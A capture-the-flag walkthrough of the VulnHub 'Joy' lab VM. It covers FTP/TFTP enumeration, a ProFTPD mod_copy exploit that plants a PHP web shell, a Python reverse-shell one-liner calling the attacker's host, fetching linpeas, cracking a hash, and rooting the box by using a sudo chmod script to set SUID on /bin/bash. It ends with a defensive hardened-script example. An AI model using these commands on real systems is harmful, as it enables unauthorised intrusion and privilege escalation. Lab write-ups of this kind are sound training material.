VulnHub : Digital World : Joy
4 July, 2021
Machine Link: https://www.vulnhub.com/entry/digitalworldlocal-joy,298/
Beginning with an nmap scan
# nmap -A -sC -sV -O -p 1-65535 192.168.56.105
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-03 13:22 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for kioptrix.com (192.168.56.105)
Host is up (0.00090s latency).
Not shown: 65523 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.2.10
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download
|_drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload
22/tcp open ssh Dropbear sshd 0.34 (protocol 2.0)
25/tcp open smtp Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after: 2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.25
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2016-07-19 20:03 ossec/
|_
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Index of /
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE CAPA UIDL RESP-CODES PIPELINING SASL TOP STLS
|_ssl-date: TLS randomness does not represent time
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: have more Pre-login post-login IDLE listed ID capabilities IMAP4rev1 SASL-IR OK STARTTLS LITERAL+ ENABLE LOGINDISABLEDA0001 LOGIN-REFERRALS
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.5.12-Debian (workgroup: WORKGROUP)
465/tcp open smtp Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after: 2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
587/tcp open smtp Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after: 2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imaps?
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after: 2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3s?
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after: 2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
MAC Address: 08:00:27:2E:E9:CA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts: The, JOY.localdomain, 127.0.1.1, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h49m58s, deviation: 4h37m07s, median: 5h29m58s
|_nbstat: NetBIOS name: JOY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.12-Debian)
| Computer name: joy
| NetBIOS computer name: JOY\x00
| Domain name: \x00
| FQDN: joy
|_ System time: 2021-07-04T06:52:30+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-03T22:52:31
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 0.90 ms kioptrix.com (192.168.56.105)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.33 seconds
Starting off with FTP on port 21, I was able to log in anonymously
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download
drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload
226 Transfer complete
ftp> ls download/
200 PORT command successful
150 Opening ASCII mode data connection for file list
226 Transfer complete
ftp> ls upload/
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rwxrwxr-x 1 ftp ftp 3322 Jul 4 12:18 directory
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_armadillo
-rw-rw-rw- 1 ftp ftp 25 Jan 6 2019 project_bravado
-rw-rw-rw- 1 ftp ftp 88 Jan 6 2019 project_desperado
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_emilio
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_flamingo
-rw-rw-rw- 1 ftp ftp 7 Jan 6 2019 project_indigo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_komodo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_luyano
-rw-rw-rw- 1 ftp ftp 8 Jan 6 2019 project_malindo
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_okacho
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_polento
-rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_ronaldinho
-rw-rw-rw- 1 ftp ftp 55 Jan 6 2019 project_sicko
-rw-rw-rw- 1 ftp ftp 57 Jan 6 2019 project_toto
-rw-rw-rw- 1 ftp ftp 5 Jan 6 2019 project_uno
-rw-rw-rw- 1 ftp ftp 9 Jan 6 2019 project_vivino
-rw-rw-rw- 1 ftp ftp 0 Jan 6 2019 project_woranto
-rw-rw-rw- 1 ftp ftp 20 Jan 6 2019 project_yolo
-rw-rw-rw- 1 ftp ftp 180 Jan 6 2019 project_zoo
-rwxrwxr-x 1 ftp ftp 24 Jan 6 2019 reminder
226 Transfer complete
# cat upload/directory
Patrick's Directory
total 140
drwxr-xr-x 18 patrick patrick 4096 Jul 4 20:20 .
drwxr-xr-x 4 root root 4096 Jan 6 2019 ..
-rw-r--r-- 1 patrick patrick 0 Jul 4 20:10 5vFhVpFiEyMyAy2z00Rn7knYZ7uEiINF.txt
-rw-r--r-- 1 patrick patrick 24 Jul 4 20:20 84HiZ9ondgcpXPflITwK38q0pKXzVTeuI907YlTDGsE4wFY7ubVarYVgGCz02NmM.txt
-rw-r--r-- 1 patrick patrick 0 Jul 4 06:55 b522HOJkT9KmFA1o93K2Kr4A3H9wzARs.txt
-rw------- 1 patrick patrick 185 Jan 28 2019 .bash_history
-rw-r--r-- 1 patrick patrick 220 Dec 23 2018 .bash_logout
-rw-r--r-- 1 patrick patrick 3526 Dec 23 2018 .bashrc
drwx------ 7 patrick patrick 4096 Jan 10 2019 .cache
-rw-r--r-- 1 patrick patrick 0 Jul 4 20:15 CBogqQgaktNmNwsuapUIF6BERmv7lUfb.txt
drwx------ 10 patrick patrick 4096 Dec 26 2018 .config
-rw-r--r-- 1 patrick patrick 24 Jul 4 06:55 cooNKosxFcWTM14AxNhvdMvTbdANMyXlNyg6FzgQMBA3tGI93J088EcEKN3dW6QL.txt
-rw-r--r-- 1 patrick patrick 0 Jul 4 07:10 CXB5EwfSYS4SXpc5231JEHP1hWoMpb4E.txt
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Desktop
-rw-r--r-- 1 patrick patrick 0 Jul 4 20:20 DNjRnjWv7UaYFOlWIC01TjcMF9dws85O.txt
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Documents
drwxr-xr-x 3 patrick patrick 4096 Jan 6 2019 Downloads
-rw-r--r-- 1 patrick patrick 24 Jul 4 20:05 EmMdc0KsYHPcYCZ8iDIVKhuUFQH4C5Szia1AXAob8SUd2XkN40rEH1YZhskEI8gM.txt
-rw-r--r-- 1 patrick patrick 0 Jul 4 07:00 fPmosPWpdFPAwK5od3gFIFxzCTfPRtKY.txt
drwx------ 3 patrick patrick 4096 Dec 26 2018 .gnupg
-rwxrwxrwx 1 patrick patrick 0 Jan 9 2019 haha
-rw------- 1 patrick patrick 8532 Jan 28 2019 .ICEauthority
-rw-r--r-- 1 patrick patrick 24 Jul 4 07:05 kDkbOhj1r8bi1b2849msZNoW4fNgntbmvMADOXr9SRvVDYEFaJKXBvK4Cau8lTwn.txt
-rw-r--r-- 1 patrick patrick 24 Jul 4 06:50 KjziWyydxbcaF3A0DkiKYfCrs65v6gVjFn9XNgRwW6yjvAtQOnv8yd2MDejgINHM.txt
drwxr-xr-x 3 patrick patrick 4096 Dec 26 2018 .local
drwx------ 5 patrick patrick 4096 Dec 28 2018 .mozilla
-rw-r--r-- 1 patrick patrick 24 Jul 4 07:00 MPJ07qjMgzql6OfiK7vqme6EXUy7OvifkErTaaFTyTcYTSPKK3AQftte1i1Jy3W8.txt
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Music
drwxr-xr-x 2 patrick patrick 4096 Jan 8 2019 .nano
-rw-r--r-- 1 patrick patrick 0 Jul 4 07:05 NBFJGoXG8EFETHsQfWoeUixMYE1Iebrt.txt
-rw-r--r-- 1 patrick patrick 0 Jul 4 20:05 ovB7mlSh4LQZtg6nZmSJE3iqZl2CyaQ6.txt
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Pictures
-rw-r--r-- 1 patrick patrick 675 Dec 23 2018 .profile
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Public
d--------- 2 root root 4096 Jan 9 2019 script
drwx------ 2 patrick patrick 4096 Dec 26 2018 .ssh
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 Sun
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Templates
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 .txt
-rw-r--r-- 1 patrick patrick 407 Jan 27 2019 version_control
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Videos
-rw-r--r-- 1 patrick patrick 24 Jul 4 20:10 WFhavh5NiqNQOepFC4YbzgYVYvj1dzADdSvdWzi5mh6XtjguYfB06KM1FRQIoiFN.txt
-rw-r--r-- 1 patrick patrick 24 Jul 4 20:15 wROD9cEKiZiKLTKjEq2MdMEXs6oqUhagvYTI5mv9OcAQyYfUqdQV5ceDHkxMjIKm.txt
-rw-r--r-- 1 patrick patrick 24 Jul 4 07:10 x5v0eiE8ulm4lPmJvkELQEEGAN0lbFLrFjtZeqmoF6QxXXYdoBKIcqyWxsBYgnQe.txt
-rw-r--r-- 1 patrick patrick 0 Jul 4 06:50 Y30soZFSLN4lWc6RfLabE6FG7M2QBbE9.txt
You should know where the directory can be accessed.
Information of this Machine!
Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux
The files had some content but not much context. The only things I could gauge were that there is a user patrick on the machine and that there is a file called version_control in its home directory.
I tried out the rest of the ports and didn't find anything significant, so I tried an nmap UDP scan
# nmap -A -sC -sV -sU -O 192.168.56.105
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 10:52 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for kioptrix.com (192.168.56.105)
Host is up (0.00059s latency).
Not shown: 958 closed ports, 39 open|filtered ports
PORT STATE SERVICE VERSION
123/udp open ntp NTP v4 (unsynchronized)
| ntp-info:
|_
137/udp open netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP)
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: d1785e76ec962f5c00000000
| snmpEngineBoots: 31
|_ snmpEngineTime: 3h00m22s
| snmp-interfaces:
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Traffic stats: 859.39 Kb sent, 859.39 Kb received
| Intel Corporation 82545EM Gigabit Ethernet Controller (Copper)
| IP address: 192.168.56.105 Netmask: 255.255.255.0
| MAC address: 08:00:27:2e:e9:ca (Oracle VirtualBox virtual NIC)
| Type: ethernetCsmacd Speed: 1 Gbps
|_ Traffic stats: 1.25 Mb sent, 1.46 Mb received
| snmp-netstat:
| TCP 0.0.0.0:21 0.0.0.0:0
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 0.0.0.0:25 0.0.0.0:0
| TCP 0.0.0.0:110 0.0.0.0:0
| TCP 0.0.0.0:139 0.0.0.0:0
| TCP 0.0.0.0:143 0.0.0.0:0
| TCP 0.0.0.0:445 0.0.0.0:0
| TCP 0.0.0.0:465 0.0.0.0:0
| TCP 0.0.0.0:587 0.0.0.0:0
| TCP 0.0.0.0:993 0.0.0.0:0
| TCP 0.0.0.0:995 0.0.0.0:0
| TCP 127.0.0.1:631 0.0.0.0:0
| TCP 127.0.0.1:3306 0.0.0.0:0
| TCP 192.168.56.105:139 192.168.56.1:39556
| UDP 0.0.0.0:68 *:*
| UDP 0.0.0.0:123 *:*
| UDP 0.0.0.0:137 *:*
| UDP 0.0.0.0:138 *:*
| UDP 0.0.0.0:161 *:*
| UDP 0.0.0.0:631 *:*
| UDP 0.0.0.0:1900 *:*
| UDP 0.0.0.0:5353 *:*
| UDP 0.0.0.0:33079 *:*
| UDP 0.0.0.0:36295 *:*
| UDP 0.0.0.0:36969 *:*
| UDP 127.0.0.1:123 *:*
| UDP 192.168.56.105:123 *:*
| UDP 192.168.56.105:137 *:*
| UDP 192.168.56.105:138 *:*
| UDP 192.168.56.255:137 *:*
|_ UDP 192.168.56.255:138 *:*
| snmp-processes:
| 1:
| Name: systemd
| Path: /sbin/init
****
| 660:
| Name: in.tftpd
| Path: /usr/sbin/in.tftpd
| Params: --listen --user tftp --address 0.0.0.0:36969 --secure /home/patrick
So tftp is running on port 36969 and serving /home/patrick (the --secure argument); let's try connecting to that
# tftp 192.168.56.105 36969
tftp> get version_control
Received 419 bytes in 0.0 seconds
# cat version_control
Version Control of External-Facing Services:
Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12
We should switch to OpenSSH and upgrade ProFTPd.
Note that we have some other configurations in this machine.
1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy.
2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.
Checking around, ProFTPd 1.3.5 has a known RCE vulnerability (CVE-2015-3306) with a public exploit at https://github.com/t0kx/exploit-CVE-2015-3306
# ./exploit.py --host 192.168.56.105 --port 21 --path "/var/www/tryingharderisjoy"
[+] CVE-2015-3306 exploit by t0kx
[+] Exploiting 192.168.56.105:21
[+] Target exploited, acessing shell at http://192.168.56.105/backdoor.php
[+] Running whoami: www-data
[+] Done
# curl "http://192.168.56.105/backdoor.php?cmd=whoami"
proftpd: 192.168.56.101:40414: SITE cpto /tmp/.www-data
# curl "http://192.168.56.105/backdoor.php?cmd=pwd"
proftpd: 192.168.56.101:40414: SITE cpto /tmp/./var/www/tryingharderisjoy
Using this I got a reverse shell
# curl "http://192.168.56.105/backdoor.php?cmd=python%20-c%20'import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.101%22,4242));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)'"
# nc -lvnp 4242
listening on [any] 4242 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.105] 41790
www-data@JOY:/var/www/tryingharderisjoy$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),123(ossec)
www-data@JOY:/var/www/tryingharderisjoy$ whoami
whoami
www-data
There was no wget or curl on the box, so I used Python's requests module to fetch linpeas
www-data@JOY:/tmp$ python -c "import requests; open('linpeas.sh', 'w').write(requests.get('http://192.168.56.101:8000/linpeas.sh').text.encode('utf-8'))"
www-data@JOY:/tmp$ ls
ls
linpeas.sh
From linpeas' output
-rw-r--r-- 1 www-data www-data 44 Dec 28 2018 /var/www/tryingharderisjoy/ossec/.htpasswd
Reading /var/www/tryingharderisjoy/ossec/.htpasswd
admin:$apr1$3Jv2Ok6H$4BMdXenVBmD2E3kXe8RVL.
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strace Not Found
-rwSr--r-- 1 root root 39K Jan 10 2016 /lib/uncompress.so
--- It looks like /lib/uncompress.so is using /proc/self/cmdline and you can modify it (strings line: /proc/self/cmdline)
--- It looks like /lib/uncompress.so is executing /tmp and you can impersonate it (strings line: /tmp)
--- It looks like /lib/uncompress.so is executing /usr/lib/X11/ and you can impersonate it (strings line: /usr/lib/X11/)
--- It looks like /lib/uncompress.so is executing basename and you can impersonate it (strings line: basename)
--- It looks like /lib/uncompress.so is executing chmod and you can impersonate it (strings line: chmod)
--- It looks like /lib/uncompress.so is executing chown and you can impersonate it (strings line: chown)
--- It looks like /lib/uncompress.so is executing cpio and you can impersonate it (strings line: cpio)
--- It looks like /lib/uncompress.so is executing gunzip and you can impersonate it (strings line: gunzip)
--- It looks like /lib/uncompress.so is executing patch and you can impersonate it (strings line: patch)
--- It looks like /lib/uncompress.so is executing perror and you can impersonate it (strings line: perror)
--- It looks like /lib/uncompress.so is executing rename and you can impersonate it (strings line: rename)
--- It looks like /lib/uncompress.so is executing sleep and you can impersonate it (strings line: sleep)
--- It looks like /lib/uncompress.so is executing uncompress and you can impersonate it (strings line: uncompress)
--- It looks like /lib/uncompress.so is executing xman and you can impersonate it (strings line: xman)
Using john, the hash cracked to "password", but I couldn't get that credential to work anywhere
# john hash --wordlist=../../HTB/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password (?)
1g 0:00:00:01 DONE 0.9345g/s 89.71p/s 89.71c/s 89.71C/s 123456..yellow
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Looking at further directories, I found some credentials
$ cd /var/www/
cd /var/www/
$ ls
ls
tryingharderisjoy
$ cd tryingharderisjoy
cd tryingharderisjoy
$ ls
ls
backdoor.php ossec
$ cd ossec
cd ossec
$ ls
ls
CONTRIB README.search img lib setup.sh
LICENSE css index.php ossec_conf.php site
README htaccess_def.txt js patricksecretsofjoy tmp
$ cat patricksecretsofjoy
cat patricksecretsofjoy
credentials for JOY:
patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis
how would these hack3rs ever find such a page?
root's password didn't work but patrick's did
$ su root
su root
Password: howtheheckdoiknowwhattherootpasswordis
su: Authentication failure
$ su patrick
su patrick
Password: apollo098765
patrick@JOY:/var/www/tryingharderisjoy/ossec$ id
id
uid=1000(patrick) gid=1000(patrick) groups=1000(patrick),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),118(scanner),1001(ftp)
patrick@JOY:/var/www/tryingharderisjoy/ossec$ whoami
whoami
patrick
patrick was allowed to run one specific script via sudo, without a password
patrick@JOY:~$ sudo -l
sudo -l
Matching Defaults entries for patrick on JOY:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User patrick may run the following commands on JOY:
(ALL) NOPASSWD: /home/patrick/script/test
The script changes the permissions of whichever file you name, and it accepts a relative path that walks out of its own directory. So I used it to set the SUID bit on /bin/bash
patrick@JOY:~$ sudo /home/patrick/script/test
sudo /home/patrick/script/test
I am practising how to do simple bash scripting!
What file would you like to change permissions within this directory?
../../../../bin/bash
../../../../bin/bash
What permissions would you like to set the file to?
4777
4777
Currently changing file permissions, please wait.
Tidying up...
Done!
patrick@JOY:~$ /bin/bash -p
/bin/bash -p
bash-4.4# id
id
uid=1000(patrick) gid=1000(patrick) euid=0(root) groups=1000(patrick),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(bluetooth),114(lpadmin),118(scanner),1001(ftp)
bash-4.4# whoami
whoami
root
bash-4.4# cd /root
cd /root
bash-4.4# ls
ls
author-secret.txt dovecot.crt dovecot.key proof.txt rootCA.pem
document-generator.sh dovecot.csr permissions.sh rootCA.key rootCA.srl
bash-4.4# cat proof.txt
cat proof.txt
Never grant sudo permissions on scripts that perform system functions!
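The script patrick could run with sudo changed the permissions of whatever path it was given, and proof.txt spells out the lesson. As an added example (not the machine's own /home/patrick/script/test, which this page never shows), the POSIX shell helper below demonstrates the two checks such a script needs so that both halves of the interaction above, the "../../../../bin/bash" path and the "4777" mode, are refused: the target must resolve inside the intended directory after canonicalisation, and the mode may not carry setuid, setgid or sticky bits. BASE_DIR, path_within_base, mode_is_safe and safe_chmod are names chosen for this example; it assumes GNU coreutils realpath.

```shell
#!/bin/sh
# Added example: a hardened "change permissions within this directory" helper.
# ASSUMPTION: the original /home/patrick/script/test is not shown on the page;
# this is a reconstruction of the checks such a script must perform, not that
# script. It refuses targets that resolve outside BASE_DIR and refuses any
# mode that sets the setuid, setgid or sticky bits.

BASE_DIR="${BASE_DIR:-$(pwd)}"

# Returns 0 if $1, taken relative to BASE_DIR, resolves to a path strictly
# inside it. realpath canonicalises "..", "." and symlinks, so a traversal
# and a symlink pointing elsewhere both fail the prefix test.
path_within_base() {
    base=$(realpath -- "$BASE_DIR") || return 1
    target=$(realpath -- "$base/$1" 2>/dev/null) || return 1
    case "$target" in
        "$base"/*) return 0 ;;
        *)         return 1 ;;
    esac
}

# Returns 0 if $1 is exactly three octal digits: rwx bits only, no special
# bits, so "4777", "u+s" and "2755" are all rejected.
mode_is_safe() {
    case "$1" in
        [0-7][0-7][0-7]) return 0 ;;
        *)               return 1 ;;
    esac
}

# Applies the mode only when both checks pass; otherwise returns 1 and
# changes nothing, so a caller running this under sudo can neither reach
# files outside BASE_DIR nor plant a SUID binary.
safe_chmod() {
    path_within_base "$1" || { echo "refused: '$1' resolves outside $BASE_DIR" >&2; return 1; }
    mode_is_safe "$2"     || { echo "refused: mode '$2' is not a plain rwx mode" >&2; return 1; }
    chmod "$2" -- "$BASE_DIR/$1"
}
```

Even with these checks in place, the real fix on JOY is the one proof.txt states: a file-permission changer should not be reachable through NOPASSWD sudo at all. If a user legitimately needs to chmod files in one directory, owning that directory already lets them do so as themselves, with no elevation involved.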